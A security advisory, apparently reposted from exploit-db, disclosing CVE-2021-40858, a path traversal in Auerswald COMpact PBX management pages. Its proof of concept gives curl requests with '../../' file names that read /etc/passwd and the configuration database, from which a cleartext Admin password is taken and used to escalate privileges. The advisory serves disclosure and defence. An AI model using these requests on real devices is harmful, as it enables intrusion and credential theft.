Auerswald COMpact 8.0B – Arbitrary File Disclosure

  • 作者: RedTeam Pentesting GmbH
    日期: 2021-12-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50568/
  • # Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure
    # Date: 06/12/2021
    # Exploit Author: RedTeam Pentesting GmbH
    
    Advisory: Auerswald COMpact Arbitrary File Disclosure
    
    
    RedTeam Pentesting discovered a vulnerability in the web-based
    management interface of the Auerswald COMpact 5500R PBX which allows
    users with the "sub-admin" privilege to access any files on the PBX's
    file system.
    
    
    Details
    =======
    
    Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
    Affected Versions: <= 8.0B (COMpact4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
    Fixed Versions: 8.2B
    Vulnerability Type: Arbitrary File Disclosure
    Security Risk: medium
    Vendor URL: https://www.auerswald.de/en/product/compact-5500r
    Vendor Status: fixed version released
    Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
    Advisory Status: published
    CVE: CVE-2021-40858
    CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858
    
    
    Introduction
    ============
    
    "Fully modular VoIP appliance for more efficient communication processes
    With the COMpact 5500R, you are originally equipped for everyday
    business - now and in the future.
    
    The fully modular architecture with 80 IP channels and all the functions
    of a large ITC server allows up to 112 subscribers and thus scales with
    your company.
    
    Continuous maintanance and expansion of the system software makes this
    versatile IP server a future-proof investment in any business
    communication."
    
    (from the vendor's homepage)
    
    
    More Details
    ============
    
    RedTeam Pentesting discovered that attackers with administrative access
    to the PBX's web-based management interface (as a so-called "sub-admin")
    can download arbitrary files from the PBX's file system. This includes
    the usually not accessible configuration database which contains the
    password for the highly privileged "Admin" user in clear text.
    
    
    Proof of Concept
    ================
    
    The command-line HTTP client curl[1] can be used to log into the
    management interface of the PBX with the username "sub-admin" and the
    password "verysecretpassword" as follows:
    
    ------------------------------------------------------------------------
    $ curl --anyauth --user sub-admin:verysecretpassword --include \
    https://192.168.1.2/tree
    
    [...]
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
    [...]
    
    [{"login":2,"userId":2222,[...]}]
    ------------------------------------------------------------------------
    
    The server returns a session ID in a cookie which is then used to check
    the access level:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Sub-Administrator"}
    ------------------------------------------------------------------------
    
    In the PBX's user management, the access level "Sub-Administrator" is
    used for user accounts who should be able to configure the PBX. There
    are also other, higher-level access privileges.
    
    Users with the "sub-admin" privilege can configure music on hold (MOH,
    "Wartemusik"), and for example listen to the currently configured music.
    In order to do this, the browser requests the music files from the PBX.
    
    The file "alarm1.wav" can be accessed with curl as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
    '&pageindex=1'
    
    HTTP/1.1 200 OK
    Content-Type: audio/x-wav; charset=
    Content-Length: 132192
    Content-disposition: attachment; filename="alarm1.wav"
    [...]
    ------------------------------------------------------------------------
    
    It was found that the PBX allows directory traversal with the string
    "../", so the file "/etc/passwd" can be accessed as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/wartemusik_verwaltung_play?'\
    'fileName=../../etc/passwd&pageindex='
    
    HTTP/1.1 200 OK
    [...]
    Content-Length: 113
    Content-disposition: attachment; filename="../../etc/passwd"
    [...]
    
    root::0:0:root:/root:/bin/sh
    netstorage::1:1::/data/ftpd:/bin/false
    web::2:2::/opt/auerswald/lighttpd:/bin/false
    ------------------------------------------------------------------------
    
    The same issue is present in the function for managing logos. A regular
    request for the file "logo1.jpg" is shown below:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'
    
    HTTP/1.1 200 OK
    X-XSS-Protection: 1
    Content-Type: image/jpg; charset=UTF-8
    Content-Length: 13986
    Content-disposition: attachment; filename="logo1.jpg"
    [...]
    ------------------------------------------------------------------------
    
    In a similar fashion as before, the file "/etc/passwd" can be accessed:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'
    
    HTTP/1.1 200 OK
    [...]
    
    root::0:0:root:/root:/bin/sh
    netstorage::1:1::/data/ftpd:/bin/false
    web::2:2::/opt/auerswald/lighttpd:/bin/false
    ------------------------------------------------------------------------
    
    For attackers, an interesting file is the SQLite[2] database file
    "/data/db/pbx4.db". It can be downloaded as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
    '192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
     > pbx4.db
    
    % Total% Received % XferdAverage Speed TimeTime TimeCurrent
     DloadUpload Total SpentLeftSpeed
    100512010051200 0162530 --:--:-- --:--:-- --:--:-- 16305
    ------------------------------------------------------------------------
    
    This file contains the password for the highly privileged "Admin" user
    account:
    
    ------------------------------------------------------------------------
    $ sqlite3 pbx4.db
    SQLite version 3.27.2 2019-02-25 16:06:06
    Enter ".help" for usage hints.
    
    sqlite> .tables
    DbFileVersionPbxMisc
    
    sqlite> select * from PbxMisc;
    [...]
    AdminPasswdHash|
    AdminLogin|Admin
    AdminPin|43214321
    AdminPasswd|S3kr1t!
    ------------------------------------------------------------------------
    
    The username and password can then be used to log into the web
    application:
    
    ------------------------------------------------------------------------
    $ curl --user 'Admin:S3kr1t!' --anyauth --include \
    https://192.168.1.2/tree
    
    HTTP/1.1 200 OK
    Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
    [...]
    
    [{"login":3,"userId":0,"userName":"",[...]}]
    ------------------------------------------------------------------------
    
    Checking the access level reveals the new privilege:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Administrator"}
    ------------------------------------------------------------------------
    
    The user "Admin", in contrast to regular administrative users
    ("sub-admin"), can access more functions and for example apply firmware
    updates.
    
    Workaround
    ==========
    
    Disable or restrict access to the web-based management if possible.
    
    
    Fix
    ===
    
    Upgrade to a firmware version which corrects this vulnerability.
    
    
    Security Risk
    =============
    
    Attackers who already have acquired administrative access as a so-called
    "sub-admin" can download a database file and access the password for the
    highly privileged "Admin" account. This account can use more functions and
    is allowed to apply firmware updates.
    
    On the one hand, exploiting this vulnerability already requires
    administrative access. On the other hand, attackers can reach
    high-privileged access to the PBX and use functions not available to
    "sub-admin" users, like firmware updates. All in all, this vulnerability
    is therefore rated to have a medium risk potential.
    
    
    Timeline
    ========
    
    2021-08-26 Vulnerability identified
    2021-09-01 Customer approved disclosure to vendor
    2021-09-10 Vendor notified
    2021-09-10 CVE ID requested
    2021-09-10 CVE ID assigned
    2021-10-05 Vendor provides access to device with fixed firmware
    2021-10-11 Vendor provides fixed firmware
    2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
    2021-12-06 Advisory published
    
    
    References
    ==========
    
    [1] https://curl.se
    [2] https://www.sqlite.org
    
    
    RedTeam Pentesting GmbH
    =======================
    
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. Hereby, security weaknesses in
    company networks or products are uncovered and can be fixed immediately.
    
    As there are only few experts in this field, RedTeam Pentesting wants to
    share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    
    More information about RedTeam Pentesting can be found at:
    https://www.redteam-pentesting.de/
    
    
    Working at RedTeam Pentesting
    =============================
    
    RedTeam Pentesting is looking for penetration testers to join our team
    in Aachen, Germany. If you are interested please visit:
    https://www.redteam-pentesting.de/jobs/
    
    
    -- 
    RedTeam Pentesting GmbH Tel.: +49 241 510081-0
    Dennewartstr. 25-27 Fax : +49 241 510081-99
    52068 Aachenhttps://www.redteam-pentesting.de
    Germany Registergericht: Aachen HRB 14004
    Geschäftsführer: Patrick Hof, Jens Liebchen